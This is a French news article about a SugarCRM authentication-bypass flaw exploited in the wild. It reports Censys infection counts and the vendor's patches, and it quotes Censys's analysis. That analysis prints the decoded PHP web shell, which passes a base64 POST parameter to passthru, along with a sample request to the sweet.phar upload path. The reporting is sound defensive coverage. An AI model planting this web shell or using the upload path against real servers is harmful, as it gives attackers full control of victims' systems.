Des centaines de serveurs SugarCRM infectés par un exploit critique dans la nature


Au cours des deux dernières semaines, des pirates ont exploité une vulnérabilité critique du système SugarCRM (gestion de la relation client) pour infecter les utilisateurs avec des logiciels malveillants qui leur donnent le contrôle total de leurs serveurs.

La vulnérabilité a commencé comme un jour zéro lorsque le code d’exploitation a été mis en ligne fin décembre. La personne qui a posté l’exploit l’a décrit comme un contournement d’authentification avec exécution de code à distance, ce qui signifie qu’un attaquant pourrait l’utiliser pour exécuter du code malveillant sur des serveurs vulnérables sans informations d’identification requises. SugarCRM a depuis publié un avis qui confirme cette description. La publication sur l’exploit comprenait également divers « dorks », qui sont de simples recherches sur le Web que les gens peuvent effectuer pour localiser des serveurs vulnérables sur Internet.

Le service de surveillance du réseau Censys a déclaré qu’au 5 janvier, il avait détecté 291 serveurs SugarCRM infectés à l’aide du jour zéro. Cela représente près de 10 % du total de 3 066 serveurs SugarCRM détectés par Censys. Les infections étaient les plus élevées aux États-Unis, avec 90, suivis de l’Allemagne, de l’Australie et de la France. Dans une mise à jour de mardi, Censys a déclaré que le nombre d’infections n’avait pas beaucoup augmenté depuis le message d’origine.

L’avis de SugarCRM, également publié le 5 janvier, a mis à disposition des correctifs et a déclaré qu’ils avaient déjà été appliqués à son service basé sur le cloud. Il a également conseillé aux utilisateurs dont les instances s’exécutaient en dehors de l’hébergement géré par SugarCloud ou SugarCRM d’installer les correctifs. L’avis indiquait que la vulnérabilité affectait les solutions logicielles Sugar Sell, Serve, Enterprise, Professional et Ultimate. Cela n’a pas eu d’impact sur le logiciel Sugar Market.

Le contournement de l’authentification, a déclaré Censys, va à l’encontre de la /index.php/ annuaire. « Une fois le contournement de l’authentification réussi, un cookie est obtenu du service et une requête POST secondaire est envoyée au chemin ‘/cache/images/sweet.phar’ qui télécharge un petit fichier encodé au format PNG contenant du code PHP qui sera exécuté par le serveur lorsqu’une autre demande de fichier est faite », ont ajouté les chercheurs de l’entreprise.

Lorsque le binaire est analysé à l’aide d’un logiciel de vidage hexadécimal et décodé, le code PHP se traduit approximativement par :

〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉

« Il s’agit d’un simple shell Web qui exécutera des commandes basées sur la valeur d’argument de requête encodée en base64 de ‘c’ (par exemple, ‘POST /cache/images/sweet.phar?c= »L2Jpbi9pZA== » HTTP/1.1’, qui exécutera la commande « / bin / id » avec les mêmes autorisations que l’ID utilisateur exécutant le service Web) « , a expliqué le message.

Un shell Web fournit une fenêtre textuelle que les attaquants peuvent utiliser comme interface pour exécuter des commandes ou du code de leur choix sur des appareils compromis. Les représentants de Censys n’ont pas répondu aux questions demandant ce que, précisément, les attaquants utilisaient les shells Web pour faire.

Les avis Censys et SugarCRM fournissent des indicateurs de compromission que les clients de SugarCRM peuvent utiliser pour déterminer s’ils ont été ciblés. Les utilisateurs de produits vulnérables doivent rechercher et installer les correctifs dès que possible.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*